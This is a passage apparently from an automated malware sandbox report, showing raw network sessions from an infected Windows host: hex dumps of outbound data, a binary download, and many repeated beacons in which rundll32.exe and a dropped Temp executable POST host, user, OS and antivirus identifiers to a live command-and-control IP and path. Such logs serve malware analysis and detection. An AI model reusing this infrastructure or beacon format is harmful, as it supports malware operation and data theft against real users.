,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. 
JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:56.476610899 CEST9982OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:56.477526903 CEST9990OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:56.477823019 CEST9995OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:56.477838993 CEST9998OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:56.478537083 CEST10000OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:56.572204113 CEST10006OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:56.572267056 CEST10014OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH
                                                                                                                                          Apr 28, 2021 22:59:56.572288036 CEST10017OUTData Raw: 62 0a 2a 6f 2f de 9a f1 f7 35 3c 86 9c cc 8e 8a 77 97 ef 47 97 ef 53 ca 3e 64 36 9a c0 93 91 53 79 1e f4 df 2f de ab 90 5c c7 23 5f 5f 7f c1 3a 3e 14 fc 1c f8 cb fb 2b 7c 74 f8 79 f1 17 c1 5a 2d c7 88 7c 51 e2 6f 07 f8 63 e1 f7 8a 2f ac a3 6b ad
                                                                                                                                          Data Ascii: b*o/5<wGS>d6Sy/\#__:>+|tyZ-|Qoc/kYfXgew7vvmeSBbRokZ'k_<i%-cLu{8m52cT6x,N#/N.tSMOb1*u5I=>~=gKwk
                                                                                                                                          Apr 28, 2021 22:59:56.572303057 CEST10022OUTData Raw: 79 ba 8e 9d f6 8b 07 1a 65 e4 af 14 72 cd 73 69 e4 cb 34 d1 ac d2 3b ca a1 c7 89 53 28 cd a3 89 93 8b bc 1b 8e 97 b2 69 41 46 4a da d9 39 59 a5 aa 4a 9c 55 9f 3c cf 55 e6 99 5d 6a 7a ab 4a da 3b 5d a7 dd da d7 7b dd de 2d b9 c9 de f1 82 5e 9b f1
                                                                                                                                          Data Ascii: yersi4;S(iAFJ9YJU<U]jzJ;]{-^?O.x^$Q|E<>.$APq*nBv'Bo<#mS6>tGeso,A\mim=[="o05[O[
                                                                                                                                          Apr 28, 2021 22:59:56.572840929 CEST10025OUTData Raw: 9b 25 a6 ff 00 90 0a bc b6 f8 a5 f2 3d e8 f6 42 f6 cc cc 93 4b dd f2 54 32 68 e1 ba 25 6d 79 07 fb b4 e5 b4 ec 12 a7 d8 d2 1a c5 4e 27 35 36 89 c6 70 2a 9d c6 85 f2 1c 57 65 f6 1f fa 67 51 cb a5 ef 3f 72 b9 a5 81 84 8d a9 e6 12 89 e7 f7 5e 1f 73
                                                                                                                                          Data Ascii: %=BKT2h%myN'56p*WegQ?r^sqzMVu+W07lYz&^y9J~J\gDKBu-?Yueg`cn,|\Wox|wa^_=39i-?{V"Igb


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
283         192.168.2.4      49920        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:56.397057056 CEST  9974                OUT        POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
284         176.111.174.114  80           192.168.2.4      49920             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:56.502569914 CEST  10001               IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
285         192.168.2.4      49921        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:56.727222919 CEST  10160               OUT        POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
286         176.111.174.114  80           192.168.2.4      49921             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:56.833528042 CEST  10190               IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
287         176.111.174.114  80           192.168.2.4      49919             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:56.859481096 CEST  10190               IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
288         192.168.2.4      49922        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:57.058213949 CEST  10191               OUT        POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
289         176.111.174.114  80           192.168.2.4      49922             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:57.161509037 CEST  10192               IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:57 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
29          176.111.174.114  80           192.168.2.4      49762             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:13.946202993 CEST  4535                IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
290         192.168.2.4      49924        176.111.174.114  80                C:\Windows\SysWOW64\rundll32.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:57.366858006 CEST  10192               OUT        POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID  Source IP        Source Port  Destination IP   Destination Port  Process
291         176.111.174.114  80           192.168.2.4      49924             C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp                             kBytes transferred  Direction  Data
Apr 28, 2021 22:59:57.467434883 CEST  10193               IN         HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:57 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
292 | 192.168.2.4 | 49925 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:57.686992884 CEST | 10193 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
293 | 176.111.174.114 | 80 | 192.168.2.4 | 49925 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:57.790180922 CEST | 10194 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:57 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
294 | 192.168.2.4 | 49926 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:58.000787973 CEST | 10194 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
295 | 176.111.174.114 | 80 | 192.168.2.4 | 49926 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:58.098908901 CEST | 10195 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:58 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
296 | 192.168.2.4 | 49928 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:58.303216934 CEST | 10195 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
297 | 176.111.174.114 | 80 | 192.168.2.4 | 49928 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:58.402904987 CEST | 10196 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:58 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
298 | 192.168.2.4 | 49929 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:58.614619970 CEST | 10196 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
299 | 176.111.174.114 | 80 | 192.168.2.4 | 49929 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:58.717684984 CEST | 10197 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:58 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 89.184.92.210 | 80 | 192.168.2.4 | 49744 | C:\Users\user\Desktop\wKYTg7Gp6P.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:58:52.444783926 CEST | 4023 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:52 GMT
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Length: 290304
                                                                                                                                          Last-Modified: Wed, 28 Apr 2021 08:31:27 GMT
                                                                                                                                          Connection: keep-alive
                                                                                                                                          ETag: "60891d5f-46e00"
                                                                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate
                                                                                                                                          Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.4 | 49763 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:14.534195900 CEST | 4536 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          300 | 192.168.2.4 | 49930 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:58.929698944 CEST | 10197 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          301 | 176.111.174.114 | 80 | 192.168.2.4 | 49930 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.030653000 CEST | 10198 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          302 | 192.168.2.4 | 49931 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:59.240889072 CEST | 10198 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


